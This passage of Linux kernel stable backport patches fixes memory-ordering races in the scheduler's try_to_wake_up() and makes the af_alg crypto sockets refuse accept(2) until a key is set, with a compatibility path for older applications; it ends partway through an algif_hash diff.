From 6a94ced1bf392ce674e04ccfe34b860e970dde4a Mon Sep 17 00:00:00 2001 From: Balbir Singh Date: Mon, 5 Sep 2016 13:16:40 +1000 Subject: [PATCH 001/315] sched/core: Fix a race between try_to_wake_up() and a woken up task commit 135e8c9250dd5c8c9aae5984fde6f230d0cbfeaf upstream. The origin of the issue I've seen is related to a missing memory barrier between check for task->state and the check for task->on_rq. The task being woken up is already awake from a schedule() and is doing the following: do { schedule() set_current_state(TASK_(UN)INTERRUPTIBLE); } while (!cond); The waker, actually gets stuck doing the following in try_to_wake_up(): while (p->on_cpu) cpu_relax(); Analysis: The instance I've seen involves the following race: CPU1 CPU2 while () { if (cond) break; do { schedule(); set_current_state(TASK_UN..) } while (!cond); wakeup_routine() spin_lock_irqsave(wait_lock) raw_spin_lock_irqsave(wait_lock) wake_up_process() } try_to_wake_up() set_current_state(TASK_RUNNING); .. list_del(&waiter.list); CPU2 wakes up CPU1, but before it can get the wait_lock and set current state to TASK_RUNNING the following occurs: CPU3 wakeup_routine() raw_spin_lock_irqsave(wait_lock) if (!list_empty) wake_up_process() try_to_wake_up() raw_spin_lock_irqsave(p->pi_lock) .. if (p->on_rq && ttwu_wakeup()) .. while (p->on_cpu) cpu_relax() .. CPU3 tries to wake up the task on CPU1 again since it finds it on the wait_queue, CPU1 is spinning on wait_lock, but immediately after CPU2, CPU3 got it. CPU3 checks the state of p on CPU1, it is TASK_UNINTERRUPTIBLE and the task is spinning on the wait_lock. Interestingly since p->on_rq is checked under pi_lock, I've noticed that try_to_wake_up() finds p->on_rq to be 0. This was the most confusing bit of the analysis, but p->on_rq is changed under runqueue lock, rq_lock, the p->on_rq check is not reliable without this fix IMHO. The race is visible (based on the analysis) only when ttwu_queue() does a remote wakeup via ttwu_queue_remote. In which case the p->on_rq change is not done uder the pi_lock. The result is that after a while the entire system locks up on the raw_spin_irqlock_save(wait_lock) and the holder spins infintely Reproduction of the issue: The issue can be reproduced after a long run on my system with 80 threads and having to tweak available memory to very low and running memory stress-ng mmapfork test. It usually takes a long time to reproduce. I am trying to work on a test case that can reproduce the issue faster, but thats work in progress. I am still testing the changes on my still in a loop and the tests seem OK thus far. Big thanks to Benjamin and Nick for helping debug this as well. Ben helped catch the missing barrier, Nick caught every missing bit in my theory. Signed-off-by: Balbir Singh [ Updated comment to clarify matching barriers. Many architectures do not have a full barrier in switch_to() so that cannot be relied upon. ] Signed-off-by: Peter Zijlstra (Intel) Acked-by: Benjamin Herrenschmidt Cc: Alexey Kardashevskiy Cc: Linus Torvalds Cc: Nicholas Piggin Cc: Nicholas Piggin Cc: Oleg Nesterov Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/e02cce7b-d9ca-1ad0-7a61-ea97c7582b37@gmail.com Signed-off-by: Ingo Molnar Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- kernel/sched/core.c | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/kernel/sched/core.c b/kernel/sched/core.c index 655d6110a6e..c8afc2c3b5e 100644 --- a/kernel/sched/core.c +++ b/kernel/sched/core.c @@ -1501,6 +1501,28 @@ try_to_wake_up(struct task_struct *p, unsigned int state, int wake_flags) success = 1; /* we're going to change ->state */ cpu = task_cpu(p); + /* + * Ensure we load p->on_rq _after_ p->state, otherwise it would + * be possible to, falsely, observe p->on_rq == 0 and get stuck + * in smp_cond_load_acquire() below. + * + * sched_ttwu_pending() try_to_wake_up() + * [S] p->on_rq = 1; [L] P->state + * UNLOCK rq->lock -----. + * \ + * +--- RMB + * schedule() / + * LOCK rq->lock -----' + * UNLOCK rq->lock + * + * [task p] + * [S] p->state = UNINTERRUPTIBLE [L] p->on_rq + * + * Pairs with the UNLOCK+LOCK on rq->lock from the + * last wakeup of our task and the schedule that got our task + * current. + */ + smp_rmb(); if (p->on_rq && ttwu_remote(p, wake_flags)) goto stat; From c73d76df37ce1fa2d96e6c97e44ba5b4edc8eb7f Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Wed, 7 Oct 2015 14:14:13 +0200 Subject: [PATCH 002/315] sched/core: Fix an SMP ordering race in try_to_wake_up() vs. schedule() commit ecf7d01c229d11a44609c0067889372c91fb4f36 upstream. Oleg noticed that its possible to falsely observe p->on_cpu == 0 such that we'll prematurely continue with the wakeup and effectively run p on two CPUs at the same time. Even though the overlap is very limited; the task is in the middle of being scheduled out; it could still result in corruption of the scheduler data structures. CPU0 CPU1 set_current_state(...) context_switch(X, Y) prepare_lock_switch(Y) Y->on_cpu = 1; finish_lock_switch(X) store_release(X->on_cpu, 0); try_to_wake_up(X) LOCK(p->pi_lock); t = X->on_cpu; // 0 context_switch(Y, X) prepare_lock_switch(X) X->on_cpu = 1; finish_lock_switch(Y) store_release(Y->on_cpu, 0); schedule(); deactivate_task(X); X->on_rq = 0; if (X->on_rq) // false if (t) while (X->on_cpu) cpu_relax(); context_switch(X, ..) finish_lock_switch(X) store_release(X->on_cpu, 0); Avoid the load of X->on_cpu being hoisted over the X->on_rq load. Reported-by: Oleg Nesterov Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Mike Galbraith Cc: Peter Zijlstra Cc: Thomas Gleixner Signed-off-by: Ingo Molnar Signed-off-by: Willy Tarreau --- kernel/sched/core.c | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/kernel/sched/core.c b/kernel/sched/core.c index c8afc2c3b5e..6a366f9d08d 100644 --- a/kernel/sched/core.c +++ b/kernel/sched/core.c @@ -1527,6 +1527,25 @@ try_to_wake_up(struct task_struct *p, unsigned int state, int wake_flags) goto stat; #ifdef CONFIG_SMP + /* + * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be + * possible to, falsely, observe p->on_cpu == 0. + * + * One must be running (->on_cpu == 1) in order to remove oneself + * from the runqueue. + * + * [S] ->on_cpu = 1; [L] ->on_rq + * UNLOCK rq->lock + * RMB + * LOCK rq->lock + * [S] ->on_rq = 0; [L] ->on_cpu + * + * Pairs with the full barrier implied in the UNLOCK+LOCK on rq->lock + * from the consecutive calls to schedule(); the first switching to our + * task, the second putting it to sleep. + */ + smp_rmb(); + /* * If the owning (remote) cpu is still in the middle of schedule() with * this task as prev, wait until its done referencing the task. From b886719145be12b36048dffbca07332500c39cf6 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:34 +0300 Subject: [PATCH 003/315] crypto: algif_skcipher - Require setkey before accept(2) commit dd504589577d8e8e70f51f997ad487a4cb6c026f upstream. Some cipher implementations will crash if you try to use them without calling setkey first. This patch adds a check so that the accept(2) call will fail with -ENOKEY if setkey hasn't been done on the socket yet. Cc: stable@vger.kernel.org Reported-by: Dmitry Vyukov Signed-off-by: Herbert Xu Tested-by: Dmitry Vyukov Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_skcipher.c | 51 +++++++++++++++++++++++++++++++++-------- 1 file changed, 42 insertions(+), 9 deletions(-) diff --git a/crypto/algif_skcipher.c b/crypto/algif_skcipher.c index 83187f497c7..c4c121a0bf8 100644 --- a/crypto/algif_skcipher.c +++ b/crypto/algif_skcipher.c @@ -31,6 +31,11 @@ struct skcipher_sg_list { struct scatterlist sg[0]; }; +struct skcipher_tfm { + struct crypto_ablkcipher *skcipher; + bool has_key; +}; + struct skcipher_ctx { struct list_head tsgl; struct af_alg_sgl rsgl; @@ -546,17 +551,41 @@ static struct proto_ops algif_skcipher_ops = { static void *skcipher_bind(const char *name, u32 type, u32 mask) { - return crypto_alloc_ablkcipher(name, type, mask); + struct skcipher_tfm *tfm; + struct crypto_ablkcipher *skcipher; + + tfm = kzalloc(sizeof(*tfm), GFP_KERNEL); + if (!tfm) + return ERR_PTR(-ENOMEM); + + skcipher = crypto_alloc_ablkcipher(name, type, mask); + if (IS_ERR(skcipher)) { + kfree(tfm); + return ERR_CAST(skcipher); + } + + tfm->skcipher = skcipher; + + return tfm; } static void skcipher_release(void *private) { - crypto_free_ablkcipher(private); + struct skcipher_tfm *tfm = private; + + crypto_free_ablkcipher(tfm->skcipher); + kfree(tfm); } static int skcipher_setkey(void *private, const u8 *key, unsigned int keylen) { - return crypto_ablkcipher_setkey(private, key, keylen); + struct skcipher_tfm *tfm = private; + int err; + + err = crypto_ablkcipher_setkey(tfm->skcipher, key, keylen); + tfm->has_key = !err; + + return err; } static void skcipher_sock_destruct(struct sock *sk) @@ -575,20 +604,24 @@ static int skcipher_accept_parent(void *private, struct sock *sk) { struct skcipher_ctx *ctx; struct alg_sock *ask = alg_sk(sk); - unsigned int len = sizeof(*ctx) + crypto_ablkcipher_reqsize(private); + struct skcipher_tfm *tfm = private; + struct crypto_ablkcipher *skcipher = tfm->skcipher; + unsigned int len = sizeof(*ctx) + crypto_ablkcipher_reqsize(skcipher); + + if (!tfm->has_key) + return -ENOKEY; ctx = sock_kmalloc(sk, len, GFP_KERNEL); if (!ctx) return -ENOMEM; - - ctx->iv = sock_kmalloc(sk, crypto_ablkcipher_ivsize(private), + ctx->iv = sock_kmalloc(sk, crypto_ablkcipher_ivsize(skcipher), GFP_KERNEL); if (!ctx->iv) { sock_kfree_s(sk, ctx, len); return -ENOMEM; } - memset(ctx->iv, 0, crypto_ablkcipher_ivsize(private)); + memset(ctx->iv, 0, crypto_ablkcipher_ivsize(skcipher)); INIT_LIST_HEAD(&ctx->tsgl); ctx->len = len; @@ -600,9 +633,9 @@ static int skcipher_accept_parent(void *private, struct sock *sk) ask->private = ctx; - ablkcipher_request_set_tfm(&ctx->req, private); + ablkcipher_request_set_tfm(&ctx->req, skcipher); ablkcipher_request_set_callback(&ctx->req, CRYPTO_TFM_REQ_MAY_BACKLOG, - af_alg_complete, &ctx->completion); + af_alg_complete, &ctx->completion); sk->sk_destruct = skcipher_sock_destruct; From 12514d469333e2c48d0c289cec88bb3d4b86ab42 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:35 +0300 Subject: [PATCH 004/315] crypto: af_alg - Disallow bind/setkey/... after accept(2) commit c840ac6af3f8713a71b4d2363419145760bd6044 upstream. Each af_alg parent socket obtained by socket(2) corresponds to a tfm object once bind(2) has succeeded. An accept(2) call on that parent socket creates a context which then uses the tfm object. Therefore as long as any child sockets created by accept(2) exist the parent socket must not be modified or freed. This patch guarantees this by using locks and a reference count on the parent socket. Any attempt to modify the parent socket will fail with EBUSY. Cc: stable@vger.kernel.org Reported-by: Dmitry Vyukov Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/af_alg.c | 35 ++++++++++++++++++++++++++++++++--- include/crypto/if_alg.h | 8 +++----- 2 files changed, 35 insertions(+), 8 deletions(-) diff --git a/crypto/af_alg.c b/crypto/af_alg.c index 1aaa555fab5..0ca108f3c84 100644 --- a/crypto/af_alg.c +++ b/crypto/af_alg.c @@ -125,6 +125,23 @@ int af_alg_release(struct socket *sock) } EXPORT_SYMBOL_GPL(af_alg_release); +void af_alg_release_parent(struct sock *sk) +{ + struct alg_sock *ask = alg_sk(sk); + bool last; + + sk = ask->parent; + ask = alg_sk(sk); + + lock_sock(sk); + last = !--ask->refcnt; + release_sock(sk); + + if (last) + sock_put(sk); +} +EXPORT_SYMBOL_GPL(af_alg_release_parent); + static int alg_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) { struct sock *sk = sock->sk; @@ -132,6 +149,7 @@ static int alg_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) struct sockaddr_alg *sa = (void *)uaddr; const struct af_alg_type *type; void *private; + int err; if (sock->state == SS_CONNECTED) return -EINVAL; @@ -157,16 +175,22 @@ static int alg_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) return PTR_ERR(private); } + err = -EBUSY; lock_sock(sk); + if (ask->refcnt) + goto unlock; swap(ask->type, type); swap(ask->private, private); + err = 0; + +unlock: release_sock(sk); alg_do_release(type, private); - return 0; + return err; } static int alg_setkey(struct sock *sk, char __user *ukey, @@ -199,11 +223,15 @@ static int alg_setsockopt(struct socket *sock, int level, int optname, struct sock *sk = sock->sk; struct alg_sock *ask = alg_sk(sk); const struct af_alg_type *type; - int err = -ENOPROTOOPT; + int err = -EBUSY; lock_sock(sk); + if (ask->refcnt) + goto unlock; + type = ask->type; + err = -ENOPROTOOPT; if (level != SOL_ALG || !type) goto unlock; @@ -252,7 +280,8 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) sk2->sk_family = PF_ALG; - sock_hold(sk); + if (!ask->refcnt++) + sock_hold(sk); alg_sk(sk2)->parent = sk; alg_sk(sk2)->type = type; diff --git a/include/crypto/if_alg.h b/include/crypto/if_alg.h index d61c1117021..2f38daaab3d 100644 --- a/include/crypto/if_alg.h +++ b/include/crypto/if_alg.h @@ -30,6 +30,8 @@ struct alg_sock { struct sock *parent; + unsigned int refcnt; + const struct af_alg_type *type; void *private; }; @@ -64,6 +66,7 @@ int af_alg_register_type(const struct af_alg_type *type); int af_alg_unregister_type(const struct af_alg_type *type); int af_alg_release(struct socket *sock); +void af_alg_release_parent(struct sock *sk); int af_alg_accept(struct sock *sk, struct socket *newsock); int af_alg_make_sg(struct af_alg_sgl *sgl, void __user *addr, int len, @@ -80,11 +83,6 @@ static inline struct alg_sock *alg_sk(struct sock *sk) return (struct alg_sock *)sk; } -static inline void af_alg_release_parent(struct sock *sk) -{ - sock_put(alg_sk(sk)->parent); -} - static inline void af_alg_init_completion(struct af_alg_completion *completion) { init_completion(&completion->completion); From a37d08973d475dcfd32c89a61f95ac1662a26d2c Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:36 +0300 Subject: [PATCH 005/315] crypto: af_alg - Add nokey compatibility path commit 37766586c965d63758ad542325a96d5384f4a8c9 upstream. This patch adds a compatibility path to support old applications that do acept(2) before setkey. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/af_alg.c | 13 ++++++++++++- include/crypto/if_alg.h | 2 ++ 2 files changed, 14 insertions(+), 1 deletion(-) diff --git a/crypto/af_alg.c b/crypto/af_alg.c index 0ca108f3c84..de130c24a64 100644 --- a/crypto/af_alg.c +++ b/crypto/af_alg.c @@ -76,6 +76,8 @@ int af_alg_register_type(const struct af_alg_type *type) goto unlock; type->ops->owner = THIS_MODULE; + if (type->ops_nokey) + type->ops_nokey->owner = THIS_MODULE; node->type = type; list_add(&node->list, &alg_types); err = 0; @@ -257,6 +259,7 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) const struct af_alg_type *type; struct sock *sk2; int err; + bool nokey; lock_sock(sk); type = ask->type; @@ -275,12 +278,17 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) security_sk_clone(sk, sk2); err = type->accept(ask->private, sk2); + + nokey = err == -ENOKEY; + if (nokey && type->accept_nokey) + err = type->accept_nokey(ask->private, sk2); + if (err) goto unlock; sk2->sk_family = PF_ALG; - if (!ask->refcnt++) + if (nokey || !ask->refcnt++) sock_hold(sk); alg_sk(sk2)->parent = sk; alg_sk(sk2)->type = type; @@ -288,6 +296,9 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) newsock->ops = type->ops; newsock->state = SS_CONNECTED; + if (nokey) + newsock->ops = type->ops_nokey; + err = 0; unlock: diff --git a/include/crypto/if_alg.h b/include/crypto/if_alg.h index 2f38daaab3d..9e6a2f38c52 100644 --- a/include/crypto/if_alg.h +++ b/include/crypto/if_alg.h @@ -51,8 +51,10 @@ struct af_alg_type { void (*release)(void *private); int (*setkey)(void *private, const u8 *key, unsigned int keylen); int (*accept)(void *private, struct sock *sk); + int (*accept_nokey)(void *private, struct sock *sk); struct proto_ops *ops; + struct proto_ops *ops_nokey; struct module *owner; char name[14]; }; From 4ad8ff672a2039270fbe29c761663488087234ad Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:37 +0300 Subject: [PATCH 006/315] crypto: algif_skcipher - Add nokey compatibility path commit a0fa2d037129a9849918a92d91b79ed6c7bd2818 upstream. This patch adds a compatibility path to support old applications that do acept(2) before setkey. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_skcipher.c | 149 ++++++++++++++++++++++++++++++++++++++-- 1 file changed, 144 insertions(+), 5 deletions(-) diff --git a/crypto/algif_skcipher.c b/crypto/algif_skcipher.c index c4c121a0bf8..db5f0f0090e 100644 --- a/crypto/algif_skcipher.c +++ b/crypto/algif_skcipher.c @@ -549,6 +549,99 @@ static struct proto_ops algif_skcipher_ops = { .poll = skcipher_poll, }; +static int skcipher_check_key(struct socket *sock) +{ + int err; + struct sock *psk; + struct alg_sock *pask; + struct skcipher_tfm *tfm; + struct sock *sk = sock->sk; + struct alg_sock *ask = alg_sk(sk); + + if (ask->refcnt) + return 0; + + psk = ask->parent; + pask = alg_sk(ask->parent); + tfm = pask->private; + + err = -ENOKEY; + lock_sock(psk); + if (!tfm->has_key) + goto unlock; + + if (!pask->refcnt++) + sock_hold(psk); + + ask->refcnt = 1; + sock_put(psk); + + err = 0; + +unlock: + release_sock(psk); + + return err; +} + +static int skcipher_sendmsg_nokey(struct kiocb *unused, struct socket *sock, + struct msghdr *msg, size_t size) +{ + int err; + + err = skcipher_check_key(sock); + if (err) + return err; + + return skcipher_sendmsg(unused, sock, msg, size); +} + +static ssize_t skcipher_sendpage_nokey(struct socket *sock, struct page *page, + int offset, size_t size, int flags) +{ + int err; + + err = skcipher_check_key(sock); + if (err) + return err; + + return skcipher_sendpage(sock, page, offset, size, flags); +} + +static int skcipher_recvmsg_nokey(struct kiocb *unused, struct socket *sock, + struct msghdr *msg, size_t ignored, int flags) +{ + int err; + + err = skcipher_check_key(sock); + if (err) + return err; + + return skcipher_recvmsg(unused, sock, msg, ignored, flags); +} + +static struct proto_ops algif_skcipher_ops_nokey = { + .family = PF_ALG, + + .connect = sock_no_connect, + .socketpair = sock_no_socketpair, + .getname = sock_no_getname, + .ioctl = sock_no_ioctl, + .listen = sock_no_listen, + .shutdown = sock_no_shutdown, + .getsockopt = sock_no_getsockopt, + .mmap = sock_no_mmap, + .bind = sock_no_bind, + .accept = sock_no_accept, + .setsockopt = sock_no_setsockopt, + + .release = af_alg_release, + .sendmsg = skcipher_sendmsg_nokey, + .sendpage = skcipher_sendpage_nokey, + .recvmsg = skcipher_recvmsg_nokey, + .poll = skcipher_poll, +}; + static void *skcipher_bind(const char *name, u32 type, u32 mask) { struct skcipher_tfm *tfm; @@ -588,7 +681,7 @@ static int skcipher_setkey(void *private, const u8 *key, unsigned int keylen) return err; } -static void skcipher_sock_destruct(struct sock *sk) +static void skcipher_sock_destruct_common(struct sock *sk) { struct alg_sock *ask = alg_sk(sk); struct skcipher_ctx *ctx = ask->private; @@ -597,10 +690,33 @@ static void skcipher_sock_destruct(struct sock *sk) skcipher_free_sgl(sk); sock_kfree_s(sk, ctx->iv, crypto_ablkcipher_ivsize(tfm)); sock_kfree_s(sk, ctx, ctx->len); +} + +static void skcipher_sock_destruct(struct sock *sk) +{ + skcipher_sock_destruct_common(sk); af_alg_release_parent(sk); } -static int skcipher_accept_parent(void *private, struct sock *sk) +static void skcipher_release_parent_nokey(struct sock *sk) +{ + struct alg_sock *ask = alg_sk(sk); + + if (!ask->refcnt) { + sock_put(ask->parent); + return; + } + + af_alg_release_parent(sk); +} + +static void skcipher_sock_destruct_nokey(struct sock *sk) +{ + skcipher_sock_destruct_common(sk); + skcipher_release_parent_nokey(sk); +} + +static int skcipher_accept_parent_common(void *private, struct sock *sk) { struct skcipher_ctx *ctx; struct alg_sock *ask = alg_sk(sk); @@ -608,9 +724,6 @@ static int skcipher_accept_parent(void *private, struct sock *sk) struct crypto_ablkcipher *skcipher = tfm->skcipher; unsigned int len = sizeof(*ctx) + crypto_ablkcipher_reqsize(skcipher); - if (!tfm->has_key) - return -ENOKEY; - ctx = sock_kmalloc(sk, len, GFP_KERNEL); if (!ctx) return -ENOMEM; @@ -642,12 +755,38 @@ static int skcipher_accept_parent(void *private, struct sock *sk) return 0; } +static int skcipher_accept_parent(void *private, struct sock *sk) +{ + struct skcipher_tfm *tfm = private; + + if (!tfm->has_key) + return -ENOKEY; + + return skcipher_accept_parent_common(private, sk); +} + +static int skcipher_accept_parent_nokey(void *private, struct sock *sk) +{ + int err; + + err = skcipher_accept_parent_common(private, sk); + if (err) + goto out; + + sk->sk_destruct = skcipher_sock_destruct_nokey; + +out: + return err; +} + static const struct af_alg_type algif_type_skcipher = { .bind = skcipher_bind, .release = skcipher_release, .setkey = skcipher_setkey, .accept = skcipher_accept_parent, + .accept_nokey = skcipher_accept_parent_nokey, .ops = &algif_skcipher_ops, + .ops_nokey = &algif_skcipher_ops_nokey, .name = "skcipher", .owner = THIS_MODULE }; From 7040a8428faf0055b9619cd1671957af4ac2dc5b Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:38 +0300 Subject: [PATCH 007/315] crypto: hash - Add crypto_ahash_has_setkey commit a5596d6332787fd383b3b5427b41f94254430827 upstream. This patch adds a way for ahash users to determine whether a key is required by a crypto_ahash transform. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/ahash.c | 5 ++++- crypto/shash.c | 4 +++- include/crypto/hash.h | 6 ++++++ 3 files changed, 13 insertions(+), 2 deletions(-) diff --git a/crypto/ahash.c b/crypto/ahash.c index bcd5efc7eb4..781a8a73a7f 100644 --- a/crypto/ahash.c +++ b/crypto/ahash.c @@ -370,6 +370,7 @@ static int crypto_ahash_init_tfm(struct crypto_tfm *tfm) struct ahash_alg *alg = crypto_ahash_alg(hash); hash->setkey = ahash_nosetkey; + hash->has_setkey = false; hash->export = ahash_no_export; hash->import = ahash_no_import; @@ -382,8 +383,10 @@ static int crypto_ahash_init_tfm(struct crypto_tfm *tfm) hash->finup = alg->finup ?: ahash_def_finup; hash->digest = alg->digest; - if (alg->setkey) + if (alg->setkey) { hash->setkey = alg->setkey; + hash->has_setkey = true; + } if (alg->export) hash->export = alg->export; if (alg->import) diff --git a/crypto/shash.c b/crypto/shash.c index 929058a6856..8e4256aae96 100644 --- a/crypto/shash.c +++ b/crypto/shash.c @@ -354,8 +354,10 @@ int crypto_init_shash_ops_async(struct crypto_tfm *tfm) crt->finup = shash_async_finup; crt->digest = shash_async_digest; - if (alg->setkey) + if (alg->setkey) { crt->setkey = shash_async_setkey; + crt->has_setkey = true; + } if (alg->export) crt->export = shash_async_export; if (alg->import) diff --git a/include/crypto/hash.h b/include/crypto/hash.h index 26cb1eb16f4..c8c79878c08 100644 --- a/include/crypto/hash.h +++ b/include/crypto/hash.h @@ -94,6 +94,7 @@ struct crypto_ahash { unsigned int keylen); unsigned int reqsize; + bool has_setkey; struct crypto_tfm base; }; @@ -181,6 +182,11 @@ static inline void *ahash_request_ctx(struct ahash_request *req) int crypto_ahash_setkey(struct crypto_ahash *tfm, const u8 *key, unsigned int keylen); +static inline bool crypto_ahash_has_setkey(struct crypto_ahash *tfm) +{ + return tfm->has_setkey; +} + int crypto_ahash_finup(struct ahash_request *req); int crypto_ahash_final(struct ahash_request *req); int crypto_ahash_digest(struct ahash_request *req); From 389378f759251c9d1927558b10a9ffca1072c951 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:49 +0300 Subject: [PATCH 008/315] crypto: shash - Fix has_key setting commit 00420a65fa2beb3206090ead86942484df2275f3 upstream. The has_key logic is wrong for shash algorithms as they always have a setkey function. So we should instead be testing against shash_no_setkey. Fixes: a5596d633278 ("crypto: hash - Add crypto_ahash_has_setkey") Cc: stable@vger.kernel.org Reported-by: Stephan Mueller Signed-off-by: Herbert Xu Tested-by: Stephan Mueller Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/shash.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/crypto/shash.c b/crypto/shash.c index 8e4256aae96..ac4d76350d1 100644 --- a/crypto/shash.c +++ b/crypto/shash.c @@ -353,11 +353,10 @@ int crypto_init_shash_ops_async(struct crypto_tfm *tfm) crt->final = shash_async_final; crt->finup = shash_async_finup; crt->digest = shash_async_digest; + crt->setkey = shash_async_setkey; + + crt->has_setkey = alg->setkey != shash_no_setkey; - if (alg->setkey) { - crt->setkey = shash_async_setkey; - crt->has_setkey = true; - } if (alg->export) crt->export = shash_async_export; if (alg->import) From 855297521e21710c6fc8c8d2909c7db7a86c37b3 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:39 +0300 Subject: [PATCH 009/315] crypto: algif_hash - Require setkey before accept(2) commit 6de62f15b581f920ade22d758f4c338311c2f0d4 upstream. Hash implementations that require a key may crash if you use them without setting a key. This patch adds the necessary checks so that if you do attempt to use them without a key that we return -ENOKEY instead of proceeding. This patch also adds a compatibility path to support old applications that do acept(2) before setkey. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_hash.c | 201 ++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 193 insertions(+), 8 deletions(-) diff --git a/crypto/algif_hash.c b/crypto/algif_hash.c index c542c0d88af..7bc3f89fffb 100644 --- a/crypto/algif_hash.c +++ b/crypto/algif_hash.c @@ -34,6 +34,11 @@ struct hash_ctx { struct ahash_request req; }; +struct algif_hash_tfm { + struct crypto_ahash *hash; + bool has_key; +}; + static int hash_sendmsg(struct kiocb *unused, struct socket *sock, struct msghdr *msg, size_t ignored) { @@ -248,22 +253,151 @@ static struct proto_ops algif_hash_ops = { .accept = hash_accept, }; +static int hash_check_key(struct socket *sock) +{ + int err; + struct sock *psk; + struct alg_sock *pask; + struct algif_hash_tfm *tfm; + struct sock *sk = sock->sk; + struct alg_sock *ask = alg_sk(sk); + + if (ask->refcnt) + return 0; + + psk = ask->parent; + pask = alg_sk(ask->parent); + tfm = pask->private; + + err = -ENOKEY; + lock_sock(psk); + if (!tfm->has_key) + goto unlock; + + if (!pask->refcnt++) + sock_hold(psk); + + ask->refcnt = 1; + sock_put(psk); + + err = 0; + +unlock: + release_sock(psk); + + return err; +} + +static int hash_sendmsg_nokey(struct kiocb *unused, struct socket *sock, + struct msghdr *msg, size_t size) +{ + int err; + + err = hash_check_key(sock); + if (err) + return err; + + return hash_sendmsg(unused, sock, msg, size); +} + +static ssize_t hash_sendpage_nokey(struct socket *sock, struct page *page, + int offset, size_t size, int flags) +{ + int err; + + err = hash_check_key(sock); + if (err) + return err; + + return hash_sendpage(sock, page, offset, size, flags); +} + +static int hash_recvmsg_nokey(struct kiocb *unused, struct socket *sock, + struct msghdr *msg, size_t ignored, int flags) +{ + int err; + + err = hash_check_key(sock); + if (err) + return err; + + return hash_recvmsg(unused, sock, msg, ignored, flags); +} + +static int hash_accept_nokey(struct socket *sock, struct socket *newsock, + int flags) +{ + int err; + + err = hash_check_key(sock); + if (err) + return err; + + return hash_accept(sock, newsock, flags); +} + +static struct proto_ops algif_hash_ops_nokey = { + .family = PF_ALG, + + .connect = sock_no_connect, + .socketpair = sock_no_socketpair, + .getname = sock_no_getname, + .ioctl = sock_no_ioctl, + .listen = sock_no_listen, + .shutdown = sock_no_shutdown, + .getsockopt = sock_no_getsockopt, + .mmap = sock_no_mmap, + .bind = sock_no_bind, + .setsockopt = sock_no_setsockopt, + .poll = sock_no_poll, + + .release = af_alg_release, + .sendmsg = hash_sendmsg_nokey, + .sendpage = hash_sendpage_nokey, + .recvmsg = hash_recvmsg_nokey, + .accept = hash_accept_nokey, +}; + static void *hash_bind(const char *name, u32 type, u32 mask) { - return crypto_alloc_ahash(name, type, mask); + struct algif_hash_tfm *tfm; + struct crypto_ahash *hash; + + tfm = kzalloc(sizeof(*tfm), GFP_KERNEL); + if (!tfm) + return ERR_PTR(-ENOMEM); + + hash = crypto_alloc_ahash(name, type, mask); + if (IS_ERR(hash)) { + kfree(tfm); + return ERR_CAST(hash); + } + + tfm->hash = hash; + + return tfm; } static void hash_release(void *private) { - crypto_free_ahash(private); + struct algif_hash_tfm *tfm = private; + + crypto_free_ahash(tfm->hash); + kfree(tfm); } static int hash_setkey(void *private, const u8 *key, unsigned int keylen) { - return crypto_ahash_setkey(private, key, keylen); + struct algif_hash_tfm *tfm = private; + int err; + + err = crypto_ahash_setkey(tfm->hash, key, keylen); + tfm->has_key = !err; + + return err; } -static void hash_sock_destruct(struct sock *sk) +static void hash_sock_destruct_common(struct sock *sk) { struct alg_sock *ask = alg_sk(sk); struct hash_ctx *ctx = ask->private; @@ -271,15 +405,40 @@ static void hash_sock_destruct(struct sock *sk) sock_kfree_s(sk, ctx->result, crypto_ahash_digestsize(crypto_ahash_reqtfm(&ctx->req))); sock_kfree_s(sk, ctx, ctx->len); +} + +static void hash_sock_destruct(struct sock *sk) +{ + hash_sock_destruct_common(sk); af_alg_release_parent(sk); } -static int hash_accept_parent(void *private, struct sock *sk) +static void hash_release_parent_nokey(struct sock *sk) +{ + struct alg_sock *ask = alg_sk(sk); + + if (!ask->refcnt) { + sock_put(ask->parent); + return; + } + + af_alg_release_parent(sk); +} + +static void hash_sock_destruct_nokey(struct sock *sk) +{ + hash_sock_destruct_common(sk); + hash_release_parent_nokey(sk); +} + +static int hash_accept_parent_common(void *private, struct sock *sk) { struct hash_ctx *ctx; struct alg_sock *ask = alg_sk(sk); - unsigned len = sizeof(*ctx) + crypto_ahash_reqsize(private); - unsigned ds = crypto_ahash_digestsize(private); 